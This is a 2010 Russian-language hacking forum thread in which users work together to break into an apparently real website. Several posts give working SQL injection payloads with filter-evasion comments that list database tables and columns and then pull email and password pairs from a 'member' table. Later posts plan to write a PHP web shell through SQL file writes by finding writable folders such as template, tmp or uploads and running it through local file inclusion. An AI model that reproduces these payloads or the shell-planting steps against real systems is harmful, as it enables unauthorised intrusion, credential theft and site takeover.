HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13451  
Старый 28.05.2010, 20:54
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

id=2/**/and/**/1=0/**//*!union+select+1,2,table_name,4+from+information_s chema.tables*/--
 
Ответить с цитированием

  #13452  
Старый 28.05.2010, 20:59
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Iceangel_ & pinch

не катит (

вот интересно information_schema.columns работает а information_schema.tables не работает

брутил имя таблицы "member"

и вот такой запрос получилось

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,column_name,4+from+/*!information_schema.columns*/+/*!where*/+/*!table_name*/=/*!CHAR*/(109,101,109,98,101,114)

...

Hasta la vista baby

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Pas sword),1),1),4+from+/*!member*/


Последний раз редактировалось Konqi; 28.05.2010 в 21:20..
 
Ответить с цитированием

  #13453  
Старый 28.05.2010, 21:20
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

есть sql, хочу создать пхп файл

1. file_priv=Y
2. magic_quotes_gpc=off
3. есть полный путь
4. есть папка icons

читаю файлики с помощью load_file, но создать файл не выходит в чем может быть проблема?
 
Ответить с цитированием

  #13454  
Старый 28.05.2010, 21:22
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

pinch

a в папке icons есть права на запись?
 
Ответить с цитированием

  #13455  
Старый 28.05.2010, 21:26
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?
 
Ответить с цитированием

  #13456  
Старый 28.05.2010, 21:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от pinch  
видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?

первый вариант, смотри на папки типа template
 
Ответить с цитированием

  #13457  
Старый 28.05.2010, 22:04
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию

pinch, посканьте сайт каким-нить сканером директорий, затем методом тыка поищите каталог на запись
 
Ответить с цитированием

  #13458  
Старый 28.05.2010, 22:08
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

pinch посмотри если сайт на кмс построен, соответсвенно скачай и посмотри какие папки есть и пробуй всe, ну и конечно пробуй папки: store, tmp,temp,img,im,admin,adm,cache,images,upl,uploads ........etc... если в них нет ограничений по исполнению в .htaccess
 
Ответить с цитированием

  #13459  
Старый 28.05.2010, 22:37
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

pinch

если система linux то попробуй записать в папке /tmp
думаю права хватит
 
Ответить с цитированием

  #13460  
Старый 29.05.2010, 00:02
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

tmp хорошо, но никак не задействовать допустим шелл из этой папки... если не ошибаюсь только при помощи локального инклуда.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.